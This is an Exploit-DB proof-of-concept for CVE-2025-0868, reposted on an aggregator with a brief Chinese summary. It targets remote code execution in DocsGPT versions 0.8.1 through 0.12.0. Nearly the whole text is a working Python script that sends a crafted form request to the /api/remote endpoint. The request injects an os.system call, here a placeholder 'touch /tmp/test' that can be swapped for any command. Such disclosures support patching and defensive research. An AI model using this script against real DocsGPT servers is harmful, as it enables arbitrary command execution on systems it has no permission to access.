[webapps] DocsGPT 0.12.0 - Remote Code Execution
文章描述了DocsGPT 0.8.1至0.12.0版本中的远程代码执行漏洞(CVE-2025-0868),通过构造恶意请求在目标系统上执行任意代码。 2025-4-9 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:12 收藏
文章描述了DocsGPT 0.8.1至0.12.0版本中的远程代码执行漏洞(CVE-2025-0868),通过构造恶意请求在目标系统上执行任意代码。 2025-4-9 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:12 收藏
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
print(f"[+] Status Code: {response.status_code}")
print("[+] Response Body:")
print(response.text)
except Exception as e:
print(f"[-] Error sending request: {e}")
文章来源: https://www.exploit-db.com/exploits/52145
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh